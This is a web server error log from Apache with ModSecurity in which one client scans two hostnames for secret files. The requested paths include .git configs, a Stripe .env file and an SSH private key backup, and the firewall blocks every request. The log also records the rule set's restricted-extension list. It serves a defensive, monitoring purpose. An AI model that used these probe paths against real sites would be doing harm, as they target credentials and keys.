[Mon May 11 11:44:18.306199 2026] [security2:error] [pid 1254212:tid 1254219] [client 185.177.72.9:22250] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGk8UYQeUtAPynIs6xVswAAAAU"]
[Mon May 11 11:44:18.330446 2026] [security2:error] [pid 1254179:tid 1254197] [client 185.177.72.9:22260] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "jeanboyault.fr"] [uri "/.git/config.old"] [unique_id "agGk8mS6k_SCYd1AVZqr-QAAARA"]
[Mon May 11 11:44:18.331627 2026] [security2:error] [pid 1254179:tid 1254197] [client 185.177.72.9:22260] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.git/config.old"] [unique_id "agGk8mS6k_SCYd1AVZqr-QAAARA"]
[Mon May 11 11:44:18.331825 2026] [security2:error] [pid 1254179:tid 1254197] [client 185.177.72.9:22260] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.git/config.old"] [unique_id "agGk8mS6k_SCYd1AVZqr-QAAARA"]
[Mon May 11 11:44:19.523223 2026] [security2:error] [pid 1254179:tid 1254197] [client 185.177.72.9:22260] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGk8mS6k_SCYd1AVZqr-QAAARA"]
[Mon May 11 11:44:19.549735 2026] [security2:error] [pid 1254212:tid 1254229] [client 185.177.72.9:22272] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.jeanboyault.fr"] [uri "/.git/config.old"] [unique_id "agGk80YQeUtAPynIs6xVtwAAAA8"]
[Mon May 11 11:44:19.550729 2026] [security2:error] [pid 1254212:tid 1254229] [client 185.177.72.9:22272] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.git/config.old"] [unique_id "agGk80YQeUtAPynIs6xVtwAAAA8"]
[Mon May 11 11:44:19.550933 2026] [security2:error] [pid 1254212:tid 1254229] [client 185.177.72.9:22272] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.git/config.old"] [unique_id "agGk80YQeUtAPynIs6xVtwAAAA8"]
[Mon May 11 11:44:20.801386 2026] [security2:error] [pid 1254212:tid 1254229] [client 185.177.72.9:22272] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGk80YQeUtAPynIs6xVtwAAAA8"]
[Mon May 11 11:44:20.827118 2026] [security2:error] [pid 1254133:tid 1254149] [client 185.177.72.9:22288] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.git/"] [unique_id "agGk9BjZymfuKpjWXeh59wAAAM0"]
[Mon May 11 11:44:20.827440 2026] [security2:error] [pid 1254133:tid 1254149] [client 185.177.72.9:22288] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.git/"] [unique_id "agGk9BjZymfuKpjWXeh59wAAAM0"]
[Mon May 11 11:44:21.997612 2026] [security2:error] [pid 1254133:tid 1254149] [client 185.177.72.9:22288] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGk9BjZymfuKpjWXeh59wAAAM0"]
[Mon May 11 11:44:22.024561 2026] [security2:error] [pid 1254328:tid 1254346] [client 185.177.72.9:22300] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.git/"] [unique_id "agGk9kRdw2n9wv6Ai48FjAAAAJA"]
[Mon May 11 11:44:22.024773 2026] [security2:error] [pid 1254328:tid 1254346] [client 185.177.72.9:22300] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.git/"] [unique_id "agGk9kRdw2n9wv6Ai48FjAAAAJA"]
[Mon May 11 11:44:23.234972 2026] [security2:error] [pid 1254328:tid 1254346] [client 185.177.72.9:22300] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGk9kRdw2n9wv6Ai48FjAAAAJA"]
[Mon May 11 11:45:00.698960 2026] [authz_core:error] [pid 1256241:tid 1256254] [client 47.128.125.47:40612] AH01630: client denied by server configuration: /home/maelbail/public_html/wp-includes/Requests/error_log
[Mon May 11 11:45:29.558270 2026] [security2:error] [pid 1254179:tid 1254189] [client 185.177.72.9:63206] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /stripe/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/stripe/.env"] [unique_id "agGlOWS6k_SCYd1AVZqsSgAAAQg"]
[Mon May 11 11:45:29.559465 2026] [security2:error] [pid 1254179:tid 1254189] [client 185.177.72.9:63206] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/stripe/.env"] [unique_id "agGlOWS6k_SCYd1AVZqsSgAAAQg"]
[Mon May 11 11:45:30.732539 2026] [security2:error] [pid 1254179:tid 1254189] [client 185.177.72.9:63206] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGlOWS6k_SCYd1AVZqsSgAAAQg"]
[Mon May 11 11:45:30.758610 2026] [security2:error] [pid 1256241:tid 1256264] [client 185.177.72.9:63216] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /stripe/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/stripe/.env"] [unique_id "agGlOpkIEwRJMyDaV55MewAAAVI"]
[Mon May 11 11:45:30.758990 2026] [security2:error] [pid 1256241:tid 1256264] [client 185.177.72.9:63216] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/stripe/.env"] [unique_id "agGlOpkIEwRJMyDaV55MewAAAVI"]
[Mon May 11 11:45:31.986239 2026] [security2:error] [pid 1256241:tid 1256264] [client 185.177.72.9:63216] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGlOpkIEwRJMyDaV55MewAAAVI"]
[Mon May 11 11:46:06.355969 2026] [security2:error] [pid 1254328:tid 1254340] [client 185.177.72.9:10924] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.config/.git/config.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.config/.git/config.test"] [unique_id "agGlXkRdw2n9wv6Ai48GEAAAAIk"]
[Mon May 11 11:46:06.356688 2026] [security2:error] [pid 1254328:tid 1254340] [client 185.177.72.9:10924] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.config/.git/config.test"] [unique_id "agGlXkRdw2n9wv6Ai48GEAAAAIk"]
[Mon May 11 11:46:09.351374 2026] [security2:error] [pid 1254328:tid 1254340] [client 185.177.72.9:10924] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGlXkRdw2n9wv6Ai48GEAAAAIk"]
[Mon May 11 11:46:09.376975 2026] [security2:error] [pid 1254133:tid 1254150] [client 185.177.72.9:10940] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.config/.git/config.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.config/.git/config.test"] [unique_id "agGlYRjZymfuKpjWXeh6YQAAAM4"]
[Mon May 11 11:46:09.377420 2026] [security2:error] [pid 1254133:tid 1254150] [client 185.177.72.9:10940] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.config/.git/config.test"] [unique_id "agGlYRjZymfuKpjWXeh6YQAAAM4"]
[Mon May 11 11:46:12.149723 2026] [security2:error] [pid 1254133:tid 1254150] [client 185.177.72.9:10940] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGlYRjZymfuKpjWXeh6YQAAAM4"]
[Mon May 11 11:46:15.643676 2026] [authz_core:error] [pid 1256241:tid 1256246] [client 47.128.28.181:11090] AH01630: client denied by server configuration: /home/tchatboo/public_html/wp-includes/customize/error_log
[Mon May 11 11:46:17.518713 2026] [security2:error] [pid 1254133:tid 1254155] [client 185.177.72.9:40696] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "jeanboyault.fr"] [uri "/admin/.ssh/id_rsa.bak"] [unique_id "agGlaRjZymfuKpjWXeh6awAAANM"]
[Mon May 11 11:46:17.556534 2026] [security2:error] [pid 1254133:tid 1254155] [client 185.177.72.9:40696] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/admin/.ssh/id_rsa.bak"] [unique_id "agGlaRjZymfuKpjWXeh6awAAANM"]
[Mon May 11 11:46:20.935903 2026] [security2:error] [pid 1254133:tid 1254155] [client 185.177.72.9:40696] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGlaRjZymfuKpjWXeh6awAAANM"]
[Mon May 11 11:46:20.963545 2026] [security2:error] [pid 1254133:tid 1254148] [client 185.177.72.9:40702] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.jeanboyault.fr"] [uri "/admin/.ssh/id_rsa.bak"] [unique_id "agGlbBjZymfuKpjWXeh6bwAAAMw"]
[Mon May 11 11:46:20.964326 2026] [security2:error] [pid 1254133:tid 1254148] [client 185.177.72.9:40702] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/admin/.ssh/id_rsa.bak"] [unique_id "agGlbBjZymfuKpjWXeh6bwAAAMw"]
[Mon May 11 11:46:23.612100 2026] [security2:error] [pid 1254133:tid 1254148] [client 185.177.72.9:40702] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGlbBjZymfuKpjWXeh6bwAAAMw"]
[Mon May 11 11:46:30.062584 2026] [security2:error] [pid 1254242:tid 1254250] [client 185.177.72.9:52502] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /azure/.git/config4"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/azure/.git/config4"] [unique_id "agGldr4KNmD_mZ_vlf82mAAAAEQ"]
[Mon May 11 11:46:30.063770 2026] [security2:error] [pid 1254242:tid 1254250] [client 185.177.72.9:52502] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/azure/.git/config4"] [unique_id "agGldr4KNmD_mZ_vlf82mAAAAEQ"]
[Mon May 11 11:46:32.912054 2026] [security2:error] [pid 1254242:tid 1254250] [client 185.177.72.9:52502] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGldr4KNmD_mZ_vlf82mAAAAEQ"]
